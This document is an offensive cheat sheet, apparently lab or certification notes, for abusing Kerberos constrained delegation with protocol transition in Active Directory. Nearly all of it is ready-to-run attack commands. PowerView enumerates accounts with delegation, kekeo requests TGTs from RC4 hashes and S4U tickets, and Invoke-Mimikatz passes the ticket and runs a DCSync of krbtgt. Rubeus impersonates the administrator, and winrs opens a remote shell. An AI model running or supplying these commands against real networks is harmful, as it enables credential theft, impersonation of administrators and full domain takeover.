2-Constrained-Delegation-with-Protocol-Transition.md

Using PowerShell

Methodology/Steps

1. List all the users having Constrained Delegation
2. Keep a note of the msDS-AllowedToDelegateTo value
3. Request for a TGT using the hash of the user with CD using kekeo (Which me must have collected before)
4. Keep a note of the TGT return ticket
5. Now request a TGS with the 2nd step and 4th step values as parameters in /service and /tgt
6. Keep a note of the TGS return Ticket
7. Now we can inject the TGS return Ticket with Inkove-Mimikatz
8. We can now list the file systems of that account. Example : ls \\dc-mysql\C$ but can not use any WMI-Commands. We can use ScriptBlock to execute commands on the system.
9. But if the user DC we can do the same process and then do a DCSync attack

---

PowerView [ Dev Branch ]

Enumerate users and computers with CD enabled

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

---

kekeo

Requesting a TGT

tgt::ask /user:websvc /domain:domain.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgt::ask /user:dcorp-adminsrv /domain:domain.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67

Request a TGS

tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:cifs/computer.domain.LOCAL
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:time/computer.domain.LOCAL|ldap/computer.domain.LOCAL

---

Invoke-Mimikatz

Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS.kirbi"'

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

ScriptBlock

Inoke-Command -ScriptBlock{whoami} -ComputerName us-mssql.us.techcorp.local

---

Using Binaries

Methodology/Steps

1. Use Rubeus to request a TGS for the user and inject it into memory
2. Remote login the machine using winrs

---

Rubeus

1. Request for a S4U

Rubeus.exe s4u /user:appsvc /rc4:1D49D390AC01D568F0EE9BE82BB74D4C /impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local /altservice:HTTP /domain:us.techcorp.local /ptt

2. Remote login using winrs

winrs -r:us-mssql cmd.exe